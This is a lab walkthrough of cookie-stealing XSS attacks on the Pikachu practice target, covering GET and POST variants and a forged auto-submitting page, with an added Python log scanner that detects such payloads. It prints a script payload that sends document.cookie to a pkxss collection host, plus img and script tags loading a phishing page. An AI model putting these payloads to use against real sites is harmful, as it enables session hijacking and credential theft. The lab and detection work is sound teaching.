The experiments below give a better understanding of the hazards and the principle of XSS.
On the Pikachu target machine, edit cookie.php and change the IP address in it to your own.
Experiment 1: How does XSS obtain a cookie?
Simply copy the pkxss files from the Pikachu target into the site directory (www) of the attacking machine.
Log in.
By default there is no data.
1.1 GET-type XSS exploit: cookie acquisition
First, remove the character length limit on the input box.
pkxss backend:
http://192.168.43.117/pkxss/pkxss_login.php
It does not contain any data yet.
Enter the following statement in the input box. After you press Enter, Pikachu is redirected to the home page.
<script>document.location = 'http://192.168.43.117/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>
Refresh the pkxss backend.
In a real scenario, we can send the URL selected in the red box to the user; once he visits this link, we get his cookie value.
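Seen from the defender's side, a link like the one described above leaves a trace in the web server's access log. The following is an added example, not part of the original write-up: it scans log lines for query parameters carrying script that reads document.cookie, and for a session identifier appearing in a URL as in the request to cookie.php. The log lines, the /app/echo.php path, the client addresses and the rule names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# The statement from the write-up; it is percent-encoded below as a GET URL would carry it.
PAGE_PAYLOAD = ("<script>document.location = 'http://192.168.43.117/pkxss/xcookie/"
                "cookie.php?cookie=' + document.cookie;</script>")

# Constructed sample lines (common log format); paths, clients and values are illustrative.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /app/echo.php?message=hello&submit=submit HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2024:10:01:00 +0000] "GET /app/echo.php?message='
    + quote(PAGE_PAYLOAD, safe="") + '&submit=submit HTTP/1.1" 200 640',
    '10.0.0.6 - - [01/Jan/2024:10:01:01 +0000] "GET /pkxss/xcookie/cookie.php?cookie=PHPSESSID%3Dabc123 HTTP/1.1" 302 0',
]

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Hypothetical rule names; each pattern is checked against the decoded parameter value.
RULES = {
    "script-tag": re.compile(r"<\s*script\b", re.I),
    "cookie-read": re.compile(r"document\s*\.\s*cookie", re.I),
    "navigation": re.compile(r"(document|window)\s*\.\s*location", re.I),
    "session-id-in-url": re.compile(r"\bPHPSESSID\s*=", re.I),
}

def normalize(value, rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return one finding per query parameter that matches at least one rule."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we can parse
        client, _method, target, _status = m.groups()
        parts = urlsplit(target)
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = normalize(raw)
            hits = sorted(rule for rule, rx in RULES.items() if rx.search(value))
            if hits:
                findings.append({"client": client, "path": parts.path,
                                 "param": name, "rules": hits})
    return findings
```

Running scan(SAMPLE_LOG) flags the second line on the message parameter and the third line on the cookie parameter, and leaves the ordinary first request alone.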
That was the GET type of XSS; next, let's demonstrate the POST type.
1.2 POST-type XSS exploit: cookie acquisition
First, look at the POST (xss) case: log in with user: admin, password: 123456, submit a parameter, and capture the packet.
We can see that the parameter is not passed in the URL.
Capture the packet and analyze it.
The parameter reaches the backend by POST. Although XSS exists, the request is sent by POST, so we cannot embed the malicious code directly in a URL and send it to the target.
How should the cookie be obtained in this case?
The attacker forges a page whose form submits automatically.
Schematic (the part selected in the red frame works on the same principle as the GET type above):
Next we look at the fake page with automatic form submission that the user is made to visit (post.html, in xcookie under pkxss in Pikachu).
In that page, change the address of the vulnerable Pikachu target to your own IP, and the address of the pkxss backend to your own IP. For convenience, the vulnerable page and pkxss can also be built on a single host.
After the modification, remember to restart the phpstudy service (with other software it is the same: just restart the environment's services).
After the modification, copy the page to the site directory (www) of another host.
Simulated malicious site:
http://192.168.43.118/post.html
When the user clicks this link, our attack on the target is carried out.
<img src="http://192.168.43.116/pikachu/pkxss/xfish/xfish.php" />
<script src="http://192.168.43.116/pikachu/pkxss/xfish/xfish.php"></script>